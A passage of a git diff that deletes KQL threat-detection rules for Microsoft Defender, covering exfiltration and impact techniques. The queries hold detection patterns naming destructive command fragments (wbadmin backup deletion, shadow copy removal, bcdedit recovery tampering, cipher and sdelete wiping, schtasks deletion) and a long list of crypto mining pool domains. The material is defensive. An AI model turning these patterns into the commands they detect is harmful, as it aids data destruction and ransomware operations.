"://169.254."))) \ No newline at end of file diff --git a/Exfiltration/Tap_Installer_Execution.kql b/Exfiltration/Tap_Installer_Execution.kql deleted file mode 100644 index 011f6fd3..00000000 --- a/Exfiltration/Tap_Installer_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Daniil Yugoslavskiy, Ian Davis, oscd.community -// Date: 2019/10/24 -// Level: medium -// Description: Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques -// Tags: attack.exfiltration, attack.t1048 -DeviceProcessEvents -| where FolderPath endswith "\\tapinstall.exe" and (not(((FolderPath contains ":\\Program Files\\Avast Software\\SecureLine VPN\\" or FolderPath contains ":\\Program Files (x86)\\Avast Software\\SecureLine VPN\\") or FolderPath contains ":\\Program Files\\OpenVPN Connect\\drivers\\tap\\" or FolderPath contains ":\\Program Files (x86)\\Proton Technologies\\ProtonVPNTap\\installer\\"))) \ No newline at end of file diff --git a/Exfiltration/WebDav_Client_Execution_Via_Rundll32.EXE.kql b/Exfiltration/WebDav_Client_Execution_Via_Rundll32.EXE.kql deleted file mode 100644 index d71f9266..00000000 --- a/Exfiltration/WebDav_Client_Execution_Via_Rundll32.EXE.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/05/02 -// Level: medium -// Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like "C:\windows\system32\davclnt.dll,DavSetCookie". -This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server). - -// Tags: attack.exfiltration, attack.t1048.003 -DeviceProcessEvents -| where ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\svchost.exe" \ No newline at end of file diff --git a/Impact/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql b/Impact/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql deleted file mode 100644 index 5a91ee73..00000000 --- a/Impact/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/12/23 -// Level: high -// Description: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365. -// Tags: attack.execution, attack.reconnaissance, attack.discovery, attack.credential_access, attack.impact -DeviceProcessEvents -| where (ProcessCommandLine contains "Add-AADInt" or ProcessCommandLine contains "ConvertTo-AADInt" or ProcessCommandLine contains "Disable-AADInt" or ProcessCommandLine contains "Enable-AADInt" or ProcessCommandLine contains "Export-AADInt" or ProcessCommandLine contains "Get-AADInt" or ProcessCommandLine contains "Grant-AADInt" or ProcessCommandLine contains "Install-AADInt" or ProcessCommandLine contains "Invoke-AADInt" or ProcessCommandLine contains "Join-AADInt" or ProcessCommandLine contains "New-AADInt" or ProcessCommandLine contains "Open-AADInt" or ProcessCommandLine contains "Read-AADInt" or ProcessCommandLine contains "Register-AADInt" or ProcessCommandLine contains "Remove-AADInt" or ProcessCommandLine contains "Restore-AADInt" or ProcessCommandLine contains "Search-AADInt" or ProcessCommandLine contains "Send-AADInt" or ProcessCommandLine contains "Set-AADInt" or ProcessCommandLine contains "Start-AADInt" or ProcessCommandLine contains "Update-AADInt") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.Exe", "pwsh.dll"))) \ No newline at end of file diff --git a/Impact/All_Backups_Deleted_Via_Wbadmin.EXE.kql b/Impact/All_Backups_Deleted_Via_Wbadmin.EXE.kql deleted file mode 100644 index 3de1df11..00000000 --- a/Impact/All_Backups_Deleted_Via_Wbadmin.EXE.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2021/12/13 -// Level: high -// Description: Detects the deletion of all backups or system state backups via "wbadmin.exe". -This technique is used by numerous ransomware families and actors. -This may only be successful on server platforms that have Windows Backup enabled. - -// Tags: attack.impact, attack.t1490 -DeviceProcessEvents -| where (ProcessCommandLine contains "keepVersions:0" and (ProcessCommandLine contains "delete" and ProcessCommandLine contains "backup")) and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE") \ No newline at end of file diff --git a/Impact/Backup_Files_Deleted.kql b/Impact/Backup_Files_Deleted.kql deleted file mode 100644 index 742c161c..00000000 --- a/Impact/Backup_Files_Deleted.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/02 -// Level: medium -// Description: Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery. -// Tags: attack.impact, attack.t1490 -DeviceFileEvents -| where (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wt.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe") and (FolderPath endswith ".VHD" or FolderPath endswith ".bac" or FolderPath endswith ".bak" or FolderPath endswith ".wbcat" or FolderPath endswith ".bkf" or FolderPath endswith ".set" or FolderPath endswith ".win" or FolderPath endswith ".dsk") \ No newline at end of file diff --git a/Impact/Boot_Configuration_Tampering_Via_Bcdedit.EXE.kql b/Impact/Boot_Configuration_Tampering_Via_Bcdedit.EXE.kql deleted file mode 100644 index e80b818d..00000000 --- a/Impact/Boot_Configuration_Tampering_Via_Bcdedit.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community -// Date: 2019/10/24 -// Level: high -// Description: Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware. -// Tags: attack.impact, attack.t1490 -DeviceProcessEvents -| where ((ProcessCommandLine contains "bootstatuspolicy" and ProcessCommandLine contains "ignoreallfailures") or (ProcessCommandLine contains "recoveryenabled" and ProcessCommandLine contains "no")) and (FolderPath endswith "\\bcdedit.exe" or ProcessVersionInfoOriginalFileName =~ "bcdedit.exe") and ProcessCommandLine contains "set" \ No newline at end of file diff --git a/Impact/Copy_From_VolumeShadowCopy_Via_Cmd.EXE.kql b/Impact/Copy_From_VolumeShadowCopy_Via_Cmd.EXE.kql deleted file mode 100644 index 0697d1a3..00000000 --- a/Impact/Copy_From_VolumeShadowCopy_Via_Cmd.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems) -// Date: 2021/08/09 -// Level: high -// Description: Detects the execution of the builtin "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use) -// Tags: attack.impact, attack.t1490 -DeviceProcessEvents -| where ProcessCommandLine contains "copy " and ProcessCommandLine contains "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy" \ No newline at end of file diff --git a/Impact/Delete_All_Scheduled_Tasks.kql b/Impact/Delete_All_Scheduled_Tasks.kql deleted file mode 100644 index 4b16c868..00000000 --- a/Impact/Delete_All_Scheduled_Tasks.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/09 -// Level: high -// Description: Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users. -// Tags: attack.impact, attack.t1489 -DeviceProcessEvents -| where (ProcessCommandLine contains " /delete " and ProcessCommandLine contains "/tn *" and ProcessCommandLine contains " /f") and FolderPath endswith "\\schtasks.exe" \ No newline at end of file diff --git a/Impact/Delete_Important_Scheduled_Task.kql b/Impact/Delete_Important_Scheduled_Task.kql deleted file mode 100644 index a382f4fb..00000000 --- a/Impact/Delete_Important_Scheduled_Task.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/09 -// Level: high -// Description: Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities -// Tags: attack.impact, attack.t1489 -DeviceProcessEvents -| where (ProcessCommandLine contains "\\Windows\\BitLocker" or ProcessCommandLine contains "\\Windows\\ExploitGuard" or ProcessCommandLine contains "\\Windows\\SystemRestore\\SR" or ProcessCommandLine contains "\\Windows\\UpdateOrchestrator\\" or ProcessCommandLine contains "\\Windows\\Windows Defender\\" or ProcessCommandLine contains "\\Windows\\WindowsBackup\\" or ProcessCommandLine contains "\\Windows\\WindowsUpdate\\") and (ProcessCommandLine contains "/delete" and ProcessCommandLine contains "/tn") and FolderPath endswith "\\schtasks.exe" \ No newline at end of file diff --git a/Impact/Deleted_Data_Overwritten_Via_Cipher.EXE.kql b/Impact/Deleted_Data_Overwritten_Via_Cipher.EXE.kql deleted file mode 100644 index 24179601..00000000 --- a/Impact/Deleted_Data_Overwritten_Via_Cipher.EXE.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: frack113 -// Date: 2021/12/26 -// Level: medium -// Description: Detects usage of the "cipher" built-in utility in order to overwrite deleted data from disk. -Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. -Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives - -// Tags: attack.impact, attack.t1485 -DeviceProcessEvents -| where ProcessCommandLine contains " /w:" and (ProcessVersionInfoOriginalFileName =~ "CIPHER.EXE" or FolderPath endswith "\\cipher.exe") \ No newline at end of file diff --git a/Impact/Deletion_of_Volume_Shadow_Copies_via_WMI_with_PowerShell.kql b/Impact/Deletion_of_Volume_Shadow_Copies_via_WMI_with_PowerShell.kql deleted file mode 100644 index 508f1f42..00000000 --- a/Impact/Deletion_of_Volume_Shadow_Copies_via_WMI_with_PowerShell.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tim Rauch, Elastic (idea) -// Date: 2022/09/20 -// Level: high -// Description: Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil -// Tags: attack.impact, attack.t1490 -DeviceProcessEvents -| where (ProcessCommandLine contains ".Delete()" or ProcessCommandLine contains "Remove-WmiObject" or ProcessCommandLine contains "rwmi" or ProcessCommandLine contains "Remove-CimInstance" or ProcessCommandLine contains "rcim") and (ProcessCommandLine contains "Get-WmiObject" or ProcessCommandLine contains "gwmi" or ProcessCommandLine contains "Get-CimInstance" or ProcessCommandLine contains "gcim") and ProcessCommandLine contains "Win32_ShadowCopy" \ No newline at end of file diff --git a/Impact/Disable_Important_Scheduled_Task.kql b/Impact/Disable_Important_Scheduled_Task.kql deleted file mode 100644 index b31674ee..00000000 --- a/Impact/Disable_Important_Scheduled_Task.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2021/12/26 -// Level: high -// Description: Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities -// Tags: attack.impact, attack.t1489 -DeviceProcessEvents -| where (ProcessCommandLine contains "\\Windows\\BitLocker" or ProcessCommandLine contains "\\Windows\\ExploitGuard" or ProcessCommandLine contains "\\Windows\\SystemRestore\\SR" or ProcessCommandLine contains "\\Windows\\UpdateOrchestrator\\" or ProcessCommandLine contains "\\Windows\\Windows Defender\\" or ProcessCommandLine contains "\\Windows\\WindowsBackup\\" or ProcessCommandLine contains "\\Windows\\WindowsUpdate\\") and (ProcessCommandLine contains "/Change" and ProcessCommandLine contains "/TN" and ProcessCommandLine contains "/disable") and FolderPath endswith "\\schtasks.exe" \ No newline at end of file diff --git a/Impact/File_Recovery_From_Backup_Via_Wbadmin.EXE.kql b/Impact/File_Recovery_From_Backup_Via_Wbadmin.EXE.kql deleted file mode 100644 index 230b30d6..00000000 --- a/Impact/File_Recovery_From_Backup_Via_Wbadmin.EXE.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), frack113 -// Date: 2024/05/10 -// Level: medium -// Description: Detects the recovery of files from backups via "wbadmin.exe". -Attackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials. - -// Tags: attack.impact, attack.t1490 -DeviceProcessEvents -| where (ProcessCommandLine contains " recovery" and ProcessCommandLine contains "recoveryTarget" and ProcessCommandLine contains "itemtype:File") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE") \ No newline at end of file diff --git a/Impact/Fsutil_Suspicious_Invocation.kql b/Impact/Fsutil_Suspicious_Invocation.kql deleted file mode 100644 index a4ffc9ee..00000000 --- a/Impact/Fsutil_Suspicious_Invocation.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Ecco, E.M. Anhaus, oscd.community -// Date: 2019/09/26 -// Level: high -// Description: Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc). -Might be used by ransomwares during the attack (seen by NotPetya and others). - -// Tags: attack.defense_evasion, attack.impact, attack.t1070, attack.t1485 -DeviceProcessEvents -| where (ProcessCommandLine contains "deletejournal" or ProcessCommandLine contains "createjournal" or ProcessCommandLine contains "setZeroData") and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe") \ No newline at end of file diff --git a/Impact/Load_Of_RstrtMgr.DLL_By_A_Suspicious_Process.kql b/Impact/Load_Of_RstrtMgr.DLL_By_A_Suspicious_Process.kql deleted file mode 100644 index 815998df..00000000 --- a/Impact/Load_Of_RstrtMgr.DLL_By_A_Suspicious_Process.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Luc Génaux -// Date: 2023/11/28 -// Level: high -// Description: Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. -This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. -It could also be used for anti-analysis purposes by shut downing specific processes. - -// Tags: attack.impact, attack.defense_evasion, attack.t1486, attack.t1562.001 -DeviceImageLoadEvents -| where (FolderPath endswith "\\RstrtMgr.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll") and ((InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Temporary Internet") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favorites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favourites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Contacts\\"))) \ No newline at end of file diff --git a/Impact/Load_Of_RstrtMgr.DLL_By_An_Uncommon_Process.kql b/Impact/Load_Of_RstrtMgr.DLL_By_An_Uncommon_Process.kql deleted file mode 100644 index c3b92be9..00000000 --- a/Impact/Load_Of_RstrtMgr.DLL_By_An_Uncommon_Process.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Luc Génaux -// Date: 2023/11/28 -// Level: low -// Description: Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process. -This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. -It could also be used for anti-analysis purposes by shut downing specific processes. - -// Tags: attack.impact, attack.defense_evasion, attack.t1486, attack.t1562.001 -DeviceImageLoadEvents -| where (FolderPath endswith "\\RstrtMgr.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll") and (not((InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or (InitiatingProcessFolderPath contains ":\\$WINDOWS.~BT\\" or InitiatingProcessFolderPath contains ":\\$WinREAgent\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\ProgramData\\" or InitiatingProcessFolderPath contains ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath contains ":\\Windows\\SoftwareDistribution\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysNative\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath contains ":\\Windows\\WinSxS\\" or InitiatingProcessFolderPath contains ":\\WUDownloadCache\\") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\is-" and InitiatingProcessFolderPath contains ".tmp\\") and InitiatingProcessFolderPath endswith ".tmp")))) \ No newline at end of file diff --git a/Impact/Network_Communication_With_Crypto_Mining_Pool.kql b/Impact/Network_Communication_With_Crypto_Mining_Pool.kql deleted file mode 100644 index 1428996b..00000000 --- a/Impact/Network_Communication_With_Crypto_Mining_Pool.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2021/10/26 -// Level: high -// Description: Detects initiated network connections to crypto mining pools -// Tags: attack.impact, attack.t1496 -DeviceNetworkEvents -| where RemoteUrl in~ ("alimabi.cn", "ap.luckpool.net", "bcn.pool.minergate.com", "bcn.vip.pool.minergate.com", "bohemianpool.com", "ca-aipg.miningocean.org", "ca-dynex.miningocean.org", "ca-neurai.miningocean.org", "ca-qrl.miningocean.org", "ca-upx.miningocean.org", "ca-zephyr.miningocean.org", "ca.minexmr.com", "ca.monero.herominers.com", "cbd.monerpool.org", "cbdv2.monerpool.org", "cryptmonero.com", "crypto-pool.fr", "crypto-pool.info", "cryptonight-hub.miningpoolhub.com", "d1pool.ddns.net", "d5pool.us", "daili01.monerpool.org", "de-aipg.miningocean.org", "de-dynex.miningocean.org", "de-zephyr.miningocean.org", "de.minexmr.com", "dl.nbminer.com", "donate.graef.in", "donate.ssl.xmrig.com", "donate.v2.xmrig.com", "donate.xmrig.com", "donate2.graef.in", "drill.moneroworld.com", "dwarfpool.com", "emercoin.com", "emercoin.net", "emergate.net", "ethereumpool.co", "eu.luckpool.net", "eu.minerpool.pw", "fcn-xmr.pool.minergate.com", "fee.xmrig.com", "fr-aipg.miningocean.org", "fr-dynex.miningocean.org", "fr-neurai.miningocean.org", "fr-qrl.miningocean.org", "fr-upx.miningocean.org", "fr-zephyr.miningocean.org", "fr.minexmr.com", "hellominer.com", "herominers.com", "hk-aipg.miningocean.org", "hk-dynex.miningocean.org", "hk-neurai.miningocean.org", "hk-qrl.miningocean.org", "hk-upx.miningocean.org", "hk-zephyr.miningocean.org", "huadong1-aeon.ppxxmr.com", "iwanttoearn.money", "jw-js1.ppxxmr.com", "koto-pool.work", "lhr.nbminer.com", "lhr3.nbminer.com", "linux.monerpool.org", "lokiturtle.herominers.com", "luckpool.net", "masari.miner.rocks", "mine.c3pool.com", "mine.moneropool.com", "mine.ppxxmr.com", "mine.zpool.ca", "mine1.ppxxmr.com", "minemonero.gq", "miner.ppxxmr.com", "miner.rocks", "minercircle.com", "minergate.com", "minerpool.pw", "minerrocks.com", "miners.pro", "minerxmr.ru", "minexmr.cn", "minexmr.com", "mining-help.ru", "miningpoolhub.com", "mixpools.org", "moner.monerpool.org", "moner1min.monerpool.org", "monero-master.crypto-pool.fr", "monero.crypto-pool.fr", "monero.hashvault.pro", "monero.herominers.com", "monero.lindon-pool.win", "monero.miners.pro", "monero.riefly.id", "monero.us.to", "monerocean.stream", "monerogb.com", "monerohash.com", "moneroocean.stream", "moneropool.com", "moneropool.nl", "monerorx.com", "monerpool.org", "moriaxmr.com", "mro.pool.minergate.com", "multipool.us", "myxmr.pw", "na.luckpool.net", "nanopool.org", "nbminer.com", "node3.luckpool.net", "noobxmr.com", "pangolinminer.comgandalph3000.com", "pool.4i7i.com", "pool.armornetwork.org", "pool.cortins.tk", "pool.gntl.co.uk", "pool.hashvault.pro", "pool.minergate.com", "pool.minexmr.com", "pool.monero.hashvault.pro", "pool.ppxxmr.com", "pool.somec.cc", "pool.support", "pool.supportxmr.com", "pool.usa-138.com", "pool.xmr.pt", "pool.xmrfast.com", "pool2.armornetwork.org", "poolchange.ppxxmr.com", "pooldd.com", "poolmining.org", "poolto.be", "ppxvip1.ppxxmr.com", "ppxxmr.com", "prohash.net", "r.twotouchauthentication.online", "randomx.xmrig.com", "ratchetmining.com", "seed.emercoin.com", "seed.emercoin.net", "seed.emergate.net", "seed1.joulecoin.org", "seed2.joulecoin.org", "seed3.joulecoin.org", "seed4.joulecoin.org", "seed5.joulecoin.org", "seed6.joulecoin.org", "seed7.joulecoin.org", "seed8.joulecoin.org", "sg-aipg.miningocean.org", "sg-dynex.miningocean.org", "sg-neurai.miningocean.org", "sg-qrl.miningocean.org", "sg-upx.miningocean.org", "sg-zephyr.miningocean.org", "sg.minexmr.com", "sheepman.mine.bz", "siamining.com", "sumokoin.minerrocks.com", "supportxmr.com", "suprnova.cc", "teracycle.net", "trtl.cnpool.cc", "trtl.pool.mine2gether.com", "turtle.miner.rocks", "us-aipg.miningocean.org", "us-dynex.miningocean.org", "us-neurai.miningocean.org", "us-west.minexmr.com", "us-zephyr.miningocean.org", "usxmrpool.com", "viaxmr.com", "webservicepag.webhop.net", "xiazai.monerpool.org", "xiazai1.monerpool.org", "xmc.pool.minergate.com", "xmo.pool.minergate.com", "xmr-asia1.nanopool.org", "xmr-au1.nanopool.org", "xmr-eu1.nanopool.org", "xmr-eu2.nanopool.org", "xmr-jp1.nanopool.org", "xmr-us-east1.nanopool.org", "xmr-us-west1.nanopool.org", "xmr-us.suprnova.cc", "xmr-usa.dwarfpool.com", "xmr.2miners.com", "xmr.5b6b7b.ru", "xmr.alimabi.cn", "xmr.bohemianpool.com", "xmr.crypto-pool.fr", "xmr.crypto-pool.info", "xmr.f2pool.com", "xmr.hashcity.org", "xmr.hex7e4.ru", "xmr.ip28.net", "xmr.monerpool.org", "xmr.mypool.online", "xmr.nanopool.org", "xmr.pool.gntl.co.uk", "xmr.pool.minergate.com", "xmr.poolto.be", "xmr.ppxxmr.com", "xmr.prohash.net", "xmr.simka.pw", "xmr.somec.cc", "xmr.suprnova.cc", "xmr.usa-138.com", "xmr.vip.pool.minergate.com", "xmr1min.monerpool.org", "xmrf.520fjh.org", "xmrf.fjhan.club", "xmrfast.com", "xmrigcc.graef.in", "xmrminer.cc", "xmrpool.de", "xmrpool.eu", "xmrpool.me", "xmrpool.net", "xmrpool.xyz", "xx11m.monerpool.org", "xx11mv2.monerpool.org", "xxx.hex7e4.ru", "zarabotaibitok.ru", "zer0day.ru") \ No newline at end of file diff --git a/Impact/New_Root_or_CA_or_AuthRoot_Certificate_to_Store.kql b/Impact/New_Root_or_CA_or_AuthRoot_Certificate_to_Store.kql deleted file mode 100644 index ef325b09..00000000 --- a/Impact/New_Root_or_CA_or_AuthRoot_Certificate_to_Store.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/04/04 -// Level: medium -// Description: Detects the addition of new root, CA or AuthRoot certificates to the Windows registry -// Tags: attack.impact, attack.t1490 -DeviceRegistryEvents -| where RegistryValueData =~ "Binary Data" and (RegistryKey contains "\\SOFTWARE\\Microsoft\\SystemCertificates\\Root\\Certificates" or RegistryKey contains "\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates" or RegistryKey contains "\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates" or RegistryKey contains "\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates" or RegistryKey contains "\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates" or RegistryKey contains "\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates" or RegistryKey contains "\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates" or RegistryKey contains "\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates" or RegistryKey contains "\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\AuthRoot\\Certificates") and RegistryKey endswith "\\Blob" \ No newline at end of file diff --git a/Impact/Portable_Gpg.EXE_Execution.kql b/Impact/Portable_Gpg.EXE_Execution.kql deleted file mode 100644 index a096491b..00000000 --- a/Impact/Portable_Gpg.EXE_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/08/06 -// Level: medium -// Description: Detects the execution of "gpg.exe" from uncommon location. Often used by ransomware and loaders to decrypt/encrypt data. -// Tags: attack.impact, attack.t1486 -DeviceProcessEvents -| where ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoOriginalFileName =~ "gpg.exe" or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool") and (not((FolderPath contains ":\\Program Files (x86)\\GNU\\GnuPG\\bin\\" or FolderPath contains ":\\Program Files (x86)\\GnuPG VS-Desktop\\" or FolderPath contains ":\\Program Files (x86)\\GnuPG\\bin\\" or FolderPath contains ":\\Program Files (x86)\\Gpg4win\\bin\\"))) \ No newline at end of file diff --git a/Impact/Potential_Active_Directory_Enumeration_Using_AD_Module_-_ProcCreation.kql b/Impact/Potential_Active_Directory_Enumeration_Using_AD_Module_-_ProcCreation.kql deleted file mode 100644 index 3f12168b..00000000 --- a/Impact/Potential_Active_Directory_Enumeration_Using_AD_Module_-_ProcCreation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2023/01/22 -// Level: medium -// Description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration. -// Tags: attack.reconnaissance, attack.discovery, attack.impact -DeviceProcessEvents -| where (ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo ") and ProcessCommandLine contains "Microsoft.ActiveDirectory.Management.dll" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/Impact/Potential_Crypto_Mining_Activity.kql b/Impact/Potential_Crypto_Mining_Activity.kql deleted file mode 100644 index db2ab577..00000000 --- a/Impact/Potential_Crypto_Mining_Activity.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/10/26 -// Level: high -// Description: Detects command line parameters or strings often used by crypto miners -// Tags: attack.impact, attack.t1496 -DeviceProcessEvents -| where (ProcessCommandLine contains " --cpu-priority=" or ProcessCommandLine contains "--donate-level=0" or ProcessCommandLine contains " -o pool." or ProcessCommandLine contains " --nicehash" or ProcessCommandLine contains " --algo=rx/0 " or ProcessCommandLine contains "stratum+tcp://" or ProcessCommandLine contains "stratum+udp://" or ProcessCommandLine contains "LS1kb25hdGUtbGV2ZWw9" or ProcessCommandLine contains "0tZG9uYXRlLWxldmVsP" or ProcessCommandLine contains "tLWRvbmF0ZS1sZXZlbD" or ProcessCommandLine contains "c3RyYXR1bSt0Y3A6Ly" or ProcessCommandLine contains "N0cmF0dW0rdGNwOi8v" or ProcessCommandLine contains "zdHJhdHVtK3RjcDovL" or ProcessCommandLine contains "c3RyYXR1bSt1ZHA6Ly" or ProcessCommandLine contains "N0cmF0dW0rdWRwOi8v" or ProcessCommandLine contains "zdHJhdHVtK3VkcDovL") and (not((ProcessCommandLine contains " pool.c " or ProcessCommandLine contains " pool.o " or ProcessCommandLine contains "gcc -"))) \ No newline at end of file diff --git a/Impact/Potential_File_Overwrite_Via_Sysinternals_SDelete.kql b/Impact/Potential_File_Overwrite_Via_Sysinternals_SDelete.kql deleted file mode 100644 index c44fdf46..00000000 --- a/Impact/Potential_File_Overwrite_Via_Sysinternals_SDelete.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/06/03 -// Level: high -// Description: Detects the use of SDelete to erase a file not the free space -// Tags: attack.impact, attack.t1485 -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "sdelete.exe" and (not((ProcessCommandLine contains " -h" or ProcessCommandLine contains " -c" or ProcessCommandLine contains " -z" or ProcessCommandLine contains " /?"))) \ No newline at end of file diff --git a/Impact/Potential_Ransomware_Activity_Using_LegalNotice_Message.kql b/Impact/Potential_Ransomware_Activity_Using_LegalNotice_Message.kql deleted file mode 100644 index d3f81814..00000000 --- a/Impact/Potential_Ransomware_Activity_Using_LegalNotice_Message.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/12/11 -// Level: high -// Description: Detect changes to the "LegalNoticeCaption" or "LegalNoticeText" registry values where the message set contains keywords often used in ransomware ransom messages -// Tags: attack.impact, attack.t1491.001 -DeviceRegistryEvents -| where (RegistryValueData contains "encrypted" or RegistryValueData contains "Unlock-Password" or RegistryValueData contains "paying") and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LegalNoticeCaption" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LegalNoticeText") \ No newline at end of file diff --git a/Impact/Potentially_Suspicious_Desktop_Background_Change_Using_Reg.EXE.kql b/Impact/Potentially_Suspicious_Desktop_Background_Change_Using_Reg.EXE.kql deleted file mode 100644 index 04a1ecbd..00000000 --- 